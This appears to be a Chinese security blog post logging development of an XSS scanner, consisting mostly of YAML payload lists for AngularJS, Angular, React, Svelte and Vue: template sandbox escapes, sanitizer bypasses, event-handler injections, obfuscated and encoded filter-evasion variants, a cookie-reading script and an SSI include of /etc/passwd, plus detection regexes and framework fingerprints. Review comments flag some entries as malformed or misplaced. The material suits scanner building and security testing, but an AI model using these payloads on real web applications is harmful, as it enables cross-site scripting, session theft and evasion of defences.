
HrBeyondXSS开发记录(1)——前端框架payload
Hrlies 2025-03-24 21:11:16 44435
所属地 陕西省

Angular Payload

# AngularJS (1.x) test strings, grouped by the mechanism each group exercises.
# Every entry is a literal string: YAML performs no interpolation, and the
# values are double-quoted because a plain scalar that starts with `{` would
# be parsed as a flow mapping.
angularjs:
  # Interpolation expressions that reach `Function` via `constructor.constructor`
  # or a property descriptor (expression-sandbox escape).
  # NOTE(review): whether these evaluate depends on the AngularJS version under
  # test — confirm before using them as a pass/fail oracle.
  sandbox_escape:
    - "{{constructor.constructor('alert(1)')()}}"
    - "{{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value, 'alert(1)' )() }}"
    - "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].__proto__,a).value, 'alert(1)')()}}"

  # `$scope` methods called with an expression string; these are source-level
  # sink shapes for code review rather than strings submitted through an input.
  unsafe_methods:
    - "$eval('alert(1)')"
    - "$evalAsync('alert(1)')"
    - "$apply('alert(1)')"

  # Filter arguments (`orderBy`, `filter`) carrying an expression.
  filter_exploit:
    - "{{'a'|orderBy:'alert(1)'}}"
    - "{{'a'| filter: 'x=alert(1)'}}"

# Angular (2+) test strings. `${payload}` is a placeholder the consumer is
# expected to substitute; to YAML it is plain text. Several groups below
# (sanitizer_bypass, dependency_injection, zone_js_exploits) are application
# source idioms — sink patterns a reviewer greps for — rather than values an
# external input could carry; keep that distinction in mind when consuming them.
angular:
  # DomSanitizer methods that mark a value as trusted and skip sanitization.
  sanitizer_bypass:
    - "bypassSecurityTrustHtml('<img src=x onerror=alert(1)>')"
    - "bypassSecurityTrustScript('alert(1)')"
    - "bypassSecurityTrustUrl('javascript:alert(1)')"

  # Template fragments placing the placeholder in an HTML sink.
  # NOTE(review): `text/ng-template` is AngularJS syntax; confirm it belongs here.
  template_injection:
    - "<div [innerHTML]='${payload}'></div>"
    - "<div innerHTML='{{ ${payload} }}'></div>"
    - "<script type='text/ng-template'>${payload}</script>"

  # Zone.js / NgZone run callbacks with the placeholder as the body.
  zone_js_exploits:
    - "Zone.current.fork({}).run(() => { ${payload} })"
    - "NgZone.runOutsideAngular(() => { ${payload} })"

  # Server-side rendering (SSR) vectors.
  ssr_attack:
    - "</xmp><script>alert(1)</script>"
    - "<div>{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1') }}</div>"

  # Attribute bindings (`[attr.*]`) fed from the placeholder.
  attribute_binding:
    - "<a [attr.href]='${payload}'>click</a>"
    - "<img [attr.src]='${payload}'>"

  # Event bindings with the placeholder as the handler expression.
  event_binding:
    - "<button (click)='${payload}'>"
    - "<div (mouseover)='${payload}'>"

  # Patterns aimed at newer releases (Angular 12+).
  modern_exploits:
    - "{{ $any({}).constructor.constructor('alert(1)')() }}"
    - "<iframe [srcdoc]='${payload}'></iframe>"
    - "<object [data]='${payload}'></object>"

  # Dependency-injection source shapes (TypeScript, not template text).
  # NOTE(review): the second entry has an unbalanced `{`; it is kept as-is here.
  dependency_injection:
    - "constructor(private sanitizer: DomSanitizer) { sanitizer.bypassSecurityTrustHtml(${payload}) }"
    - "@Injectable({ providedIn: 'root' }) class ExploitService { constructor() { ${payload} }"

  # Server-side template injection probes (`7 * 7` arithmetic check).
  ssti:
    - "{{ 7 * 7 }}<%= 7 * 7 %>"
    - "{{ config.__proto__.ENV = {}; ${payload} }}"

# Encoding / obfuscation variants of the Angular strings above.
encoding_strategies:
  angular_specific:
    # Template-expression obfuscation via `charAt` override.
    - "{{ 'a'.constructor.prototype.charAt=[].join; $eval('x=${payload}') }}"

    # Unicode escapes. In YAML double quotes `\u007B` is decoded by the
    # parser, so the loaded value is literally `{{ alert(1) }}` (as the
    # trailing comment says); if the escaped form itself is wanted, write
    # `\\u007B` or use single quotes.
    - "\u007B\u007B alert(1) \u007D\u007D"  # {{ alert(1) }}

    # Character insertion: `%2b` is a URL-encoded `+` splitting `alert`.
    - "{{ 'a'|orderBy:'al'%2b'ert(1)' }}"

    # Mixed encoding; `${payload|base64}` presumably asks the consumer to
    # base64-encode the substituted value — confirm against the consumer.
    - "<div [innerHTML]='${payload|base64}'></div>"

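# Context-sensitive detection rules. The key names suggest they are applied
# to response or source text to recognise an Angular template context —
# confirm against the consumer.
context_rules:
  template_expression:
    # Regex bodies without surrounding slashes. `\\` in YAML double quotes
    # loads as one backslash, so the consumer receives e.g. `\{\{.*\}\}`.
    detection_patterns:
      - "\\{\\{.*\\}\\}"
      # Property `[prop]=` or event `(event)=` binding. The character class
      # must open with an unescaped `[`; the previous form `\\[\\(].*=` only
      # matched the literal text `[(]` and never fired on real bindings.
      - "[\\[(].*="
    # Attribute names where an interpolated value lands in a sensitive sink.
    injection_points:
      - "innerHTML"
      - "href"
      - "style"

  security_sensitive:
    # Source-code substrings indicating sanitization is bypassed or the DOM
    # is touched directly.
    dangerous_methods:
      - "bypassSecurityTrust"
      - "renderer2.createElement"
      - "ElementRef.nativeElement"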

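# Framework / version fingerprinting markers.
version_detection:
  # Substrings typical of AngularJS (1.x) markup.
  angularjs_signatures:
    - "ng-app"
    - "data-ng-"
    - "ng-controller"

  # Substrings typical of Angular (2+) bundles and sources.
  angular_signatures:
    - "platformBrowserDynamic"
    - "@Component"
    - "CommonModule"

  version_patterns:
    # Response-header string.
    - "X-Powered-By: Angular"
    # Quoted for consistency with every other entry; the value is unchanged.
    # NOTE(review): this is a JS-style `/.../` literal whereas
    # `context_rules.detection_patterns` holds bare regex bodies — confirm
    # which form the consumer expects.
    - '/angular\/(\d+\.\d+\.\d+)/'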

React Payload

# React class-component patterns. These are source-code shapes (sink
# patterns for review) with `${payload}` as a placeholder; YAML does not
# interpolate it.
react_class:
  # `dangerouslySetInnerHTML` value objects with the placeholder in an
  # event-handler or srcdoc position.
  dangerously_set_innerhtml:
    - "{ __html: '<img src=x onerror=${payload}>' }"
    - "{ __html: '<svg onload=${payload}>' }"
    - "{ __html: '<iframe srcdoc=\"${payload}\">' }"

  # Lifecycle methods whose body is the placeholder.
  lifecycle_injection:
    - "componentDidMount() { ${payload} }"
    - "UNSAFE_componentWillReceiveProps() { ${payload} }"

  # Direct `innerHTML` assignment through refs / `findDOMNode`.
  ref_manipulation:
    - "this.myRef.current.innerHTML = ${payload}"
    - "ReactDOM.findDOMNode(this).innerHTML = ${payload}"

# React function-component hook call sites with the placeholder in the
# callback or DOM-assignment position (source-level sink patterns).
react_hooks:
  # Effect hooks whose callback body is the placeholder.
  useEffect_exploit:
    - "useEffect(() => { ${payload} }, [])"
    - "useLayoutEffect(() => { ${payload} }, [])"

  # `useRef` / `useImperativeHandle` reaching the DOM or exposing a callable.
  useRef_dom_injection:
    - "const ref = useRef(); ref.current.innerHTML = ${payload}"
    - "useImperativeHandle(ref, () => ({ exec: () => ${payload} }))"

  # State initialisers / updaters given as callbacks.
  state_callback:
    - "setState(() => { ${payload} })"
    - "useState(() => { ${payload} })"

# JSX expression positions. Entries are double-quoted because a plain scalar
# starting with `{` would be read as a YAML flow mapping.
jsx_injection:
  # Bare `{ }` expression slots.
  expression_escape:
    - "{${payload}}"
    - "{JSON.stringify({ data: ${payload} })}"

  # Attribute values computed from the placeholder.
  attribute_injection:
    - "style={{ color: ${payload} }}"
    - "className={${payload}}"
    - "data-payload={${payload}}"

  # Spread of a placeholder object into props.
  spread_operator:
    - "{...${payload}}"
    - "<div {...${payload}} />"

# Next.js-specific source shapes (module-level code, not template strings).
nextjs:
  # Client / server component boundaries.
  server_components:
    - "'use client'; ${payload}"
    - "export default function Page() { return (${payload}) }"

  # Data-fetching exports whose body is the placeholder.
  getServerSideProps:
    - "export async function getServerSideProps() { ${payload} }"
    - "export const getStaticProps = () => { ${payload} }"

  # Edge runtime configuration followed by the placeholder.
  edge_runtime:
    - "export const config = { runtime: 'edge' }; ${payload}"

# Less direct React vectors.
advanced:
  # Prototype writes that change what every component renders.
  prototype_pollution:
    - "Object.prototype.innerHTML = ${payload}"
    - "this.__proto__.render = () => ${payload}"

  # Immediately-invoked arrow functions inside a JSX expression slot.
  jsx_function_exec:
    - "{(_ => ${payload})()}"
    - "{(() => ${payload})()}"

  # `\\u` / `\\x` in YAML double quotes load with the backslash kept, so the
  # consumer receives the escaped text (e.g. `{\u0061lert(1)}`), unlike the
  # single-backslash forms used in other listings, which YAML decodes.
  unicode_smuggling:
    - "{\\u0061lert(1)}"
    - "{['\\x61\\x6c\\x65\\x72\\x74'](1)}"

  # JSFuck-style encoding; quoted so `[` is not read as a YAML flow sequence.
  jsfuck_encoded:
    - "{(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]}"

# Older React API shapes (string refs, `ReactDOM.render`).
legacy:
  # String refs; the second entry uses the placeholder as the ref name.
  string_refs:
    - "ref='${payload}'"
    - "this.refs.${payload}.innerHTML = ''"

  # `createElement` / `render` calls carrying the placeholder.
  react_create_element:
    - "React.createElement('div', { dangerouslySetInnerHTML: { __html: ${payload} }})"
    - "ReactDOM.render(${payload}, document.body)"

# Hybrid vectors that combine the placeholder with a fixed expression.
polyglot:
  hybrid_vectors:
    - "');alert(1);('"  # closes the surrounding expression/string
    - "${payload} || alert(1)"
    - "typeof ${payload} === 'function' && ${payload}()"

Svelte Payload

# Svelte 3 template and script shapes. Entries referencing identifiers such
# as `unsafeVariable` or `componentWithXSS` are source-level sink patterns
# whose meaning depends on what the surrounding component binds to them.
svelte3:
  # `{@html ...}` raw-HTML tag, the documented way to bypass escaping.
  template_injection:
    - "{@html '<img src=x onerror=alert(1)>'}"
    - "{@html decodeURIComponent('%3Cscript%3Ealert(1)%3C/script%3E')}"
    - "<div>{@html unsafeVariable}</div>"

  # `on:` event directives with inline handlers.
  event_handlers:
    - "on:click={() => alert(1)}"
    - "on:mouseover={e => prompt(1)}"
    - "on:load={event => new Function('alert(1)')()}"

  # Attribute bindings fed from expressions.
  attribute_binding:
    - "<a href={javascript:alert(1)}>click</a>"
    - "<iframe srcdoc={unescapedHTML}>"
    - "<div bind:innerHTML={maliciousContent}></div>"

  # `<svelte:component>` / window / body directives with bound handlers.
  dynamic_components:
    - "<svelte:component this={componentWithXSS}/>"
    - "<svelte:window on:keydown={handleKey}/>"
    - "<svelte:body on:click={executePayload}/>"

  # Store subscriptions whose callback evaluates the stored value.
  store_exploits:
    - "$store.subscribe(value => eval(value))"
    - "writable('alert(1)').update(v => eval(v))"
    - "derived(stores, values => new Function(values))"

# Newer Svelte (runes-era) shapes plus SSR and compile-time vectors.
svelte4:
  # Rune-based reactivity (`$effect`, `$derived`, `$props`).
  reactivity_bypass:
    - "$effect(() => { ${payload} })"
    - "$derived(() => { eval(inputValue) })"
    - "<script rune> let { pwn = alert(1) } = $props() </script>"

  # Server-side rendering (SSR) vectors; the first mixes an SSI include
  # directive into the raw-HTML tag.
  ssr_vectors:
    - "{@html '<%%>'}<!--#include virtual=\"/etc/passwd\"-->"
    - "<div data-sveltekit-fetched='javascript:alert(1)'></div>"
    - "<svelte:head><!--{ '-->' + payload + '<!--' }--></svelte:head>"

  # Compile-time features (module scripts, ignore comments).
  # NOTE(review): the `svelte-ignore` entry is a lint-suppression comment,
  # not an executable vector — it is presumably a marker for review.
  compile_time:
    - "<script context='module'>window.__payload = 'alert(1)'</script>"
    - "<!--svelte-ignore a11y-click-events-have-key-events-->"
    - "<div on:click={unsafeHandler}></div>"

# Generic (framework-independent) strings.
common:
  # Scheme / encoding variants of `javascript:` and `data:` URLs.
  encoded_payloads:
    - "JaVaScRiPt:alert(1)"
    - "data:text/html;charset=utf-8,<script>parent.alert(1)</script>"
    - "javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"

  # Scripts rewriting their own parent element / self-referencing components.
  dom_manipulation:
    - "<script>document.currentScript.parentElement.innerHTML = '<img src=x onerror=alert(1)>'</script>"
    - "<svelte:self let:props><script>props.execute()</script></svelte:self>"

  # Deferred execution through timers, idle callbacks and workers.
  async_execution:
    - "setTimeout(() => alert(1), 500)"
    - "requestIdleCallback(() => { ${payload} })"
    - "new SharedWorker('data:application/javascript,alert(1)')"

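# Strings chosen per injection context (element body, attribute, template
# literal). Trailing whitespace after the last entry was removed; the values
# themselves are unchanged.
context_sensitive:
  # Inside an HTML element body.
  html_element:
    - "<script>console.log`${document.cookie}`</script>"
    - "<style>@import url(javascript:alert(1));</style>"

  # Inside an attribute value (URL schemes).
  attribute_context:
    - "javascript:import('data:text/javascript,alert(1)')"
    - "data:text/svelte,<svelte:options accessors/><script>export let pwn=alert(1);</script>"

  # Inside a JS template literal; `\\x28` loads with the backslash kept.
  template_literals:
    - "`${alert(1)}`"
    - "new Function`alert\\x28document.domain\\x29`"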

# Obfuscated variants.
# NOTE(review): the `unicode_smuggling` entries use single-backslash `\u`
# inside YAML double quotes, which the YAML parser decodes at load time —
# the consumer receives plain `alert(1)` and `<script>alert(1)</script>`,
# so the "smuggling" is lost before use. The Vue listing writes `\\u` for
# the same purpose and keeps the escape; confirm which form is intended.
advanced_obfuscation:
  unicode_smuggling:
    - "\u0061\u006c\u0065\u0072\u0074(1)"
    - "<\u0073cript>alert(1)</script>"

  # HTML / JS comments wrapped around the executable part.
  comment_bypass:
    - "<!-- --><script>alert(1)</script><!-- -->"
    - "/**/eval/**/(atob('YWxlcnQoMSk='))/**/"

  # Percent-encoded newline / colon inserted into tag and function names.
  chunked_encoding:
    - "<scri%0apt>aler%0at(1)</script>"
    - "<svelte%3Acomponent this=window['al'+'ert']/>"

Vue Payload

# Vue 2 template and directive shapes. `${payload}` is a placeholder for the
# consumer; YAML does not interpolate it. Entries using `_c`, `_s`, `_vm`
# refer to Vue 2 render-function internals.
vue2:
  template_injection:
    - "{{ _c.escape(_s(${payload})) }}"                 # escape-helper bypass
    - "{{ constructor.constructor('alert(1)')() }}"      # constructor chain
    - "{{ _vm.$options.methods.__proto__.x = ${payload} }}" # prototype pollution

  directives:
    v_html:
      - "<div v-html='_c.escape(_s(${payload}))'></div>"  # v-html directive
      - "<component :is='${payload}'></component>"        # dynamic component

    v_bind:
      - ":href='javascript:alert(1)'"                     # javascript: URL binding
      - ":style='{color: ${payload}}'"                    # CSS injection

  event_handlers:
    - "@click='${payload}'"                              # click handler
    - "@mouseover=\"${payload}\""                        # double-quoted handler
    - "v-on:focus='new Function(${payload})'"            # dynamic Function construction

  filter_exploits:
    - "{{ 'alert(1)' | filterFunction }}"                # filter argument
    - "{{ _vm.$options.filters.__proto__.x = ${payload} }}" # filter prototype pollution

  # NOTE(review): `{{#with}}` is Handlebars/Mustache block syntax, not Vue —
  # confirm this group belongs under vue2.
  ssr:
    - "{{#with this}}<script>${payload}</script>{{/with}}" # Mustache-style template
    - "<% ${payload} %>"                                  # server-side template

# Vue 3 source shapes (composition API, renderer, ecosystem libraries).
# Most entries are application-code sink patterns rather than input strings.
vue3:
  composition_api:
    setup_script:
      - "<script setup>${payload}</script>"              # <script setup> block
      - "const exploit = () => eval(${payload})"         # arrow function calling eval

    reactivity:
      - "ref(${payload})"                                # reactive ref
      - "window.__vue_app__.config.globalProperties.${payload}" # globalProperties access

  renderer:
    - "createRenderer({ patchProp: ${payload} })"        # renderer hook override
    - "h('div', { innerHTML: ${payload} })"              # VNode with innerHTML

  modern_features:
    suspense:
      - "<Suspense><template #default>${payload}</template></Suspense>"

    teleport:
      - "<Teleport to='body'>${payload}</Teleport>"

  ecosystem:
    vue_router:
      - "router.beforeEach((${payload}) => {})"           # navigation guard
      - "this.$router.addRoutes([{ component: ${payload} }])"

    vuex:
      - "store.subscribeAction({ after: ${payload} })"    # action subscription
      - "this.$store._modules.root._rawModule.actions = ${payload}"

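# Obfuscated identifier forms. `\\u` / `\\x` in YAML double quotes load with
# the backslash kept, so the consumer receives the escaped text.
# NOTE(review): a top-level key of the same name exists in the Svelte listing;
# keep the listings as separate documents — merged into one mapping, most
# parsers silently keep only the last definition.
advanced_obfuscation:
  unicode_escape:
    - "\\u0061\\u006c\\u0065\\u0072\\u0074(1)"           # Unicode escape of alert
    - "\\x61\\x6c\\x65\\x72\\x74(1)"                     # hex escape

  string_concat:
    # Single-quoted so the JS expression `"aler" + "t(1)"` is one scalar;
    # the earlier `- "aler" + "t(1)"` was a YAML syntax error (text after a
    # closed quoted scalar) that broke parsing of the whole document.
    - '"aler" + "t(1)"'
    - "window['al' + 'ert'](1)"

  template_literals:
    - "alert`1`"
    - "window[`al${'ert'}`](1)"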

# Vue provide/inject and plugin registration source shapes.
dependency_injection:
  provide_inject:
    - "provide('xss', ${payload})"                       # provide sink
    - "inject('xss')"                                    # matching inject
  plugin_abuse:
    - "app.use({ install: ${payload} })"                 # plugin install hook
    - "app.mixin({ created: ${payload} })"               # global mixin hook

# Server-side rendering shapes for Nuxt and VuePress.
server_side:
  nuxt_ssr:
    - "<%= ${payload} %>"                                # Nuxt server template
    - "useAsyncData(() => ${payload})"                   # async data callback

  vuepress:
    - "{{ $page.${payload} }}"                           # theme variable access
    - "<ClientOnly>${payload}</ClientOnly>"              # client-only slot

# Strings that decode or redefine at runtime so static filters see a
# different value than what executes.
defense_evasion:
  sanitizer_bypass:
    - "{{ decodeURIComponent(${payload}) }}"             # decode inside the template
    - "<div v-html='bypassSanitization(${payload})'></div>"

  sandbox_escape:
    - "with(this){${payload}}"                           # with-statement scope escape
    - "Object.defineProperty(this, 'x', { value: ${payload} })"

最近时间安排比较紧张,整合了各种框架的payload。

# xss扫描 # xss绕过
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Hrlies 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)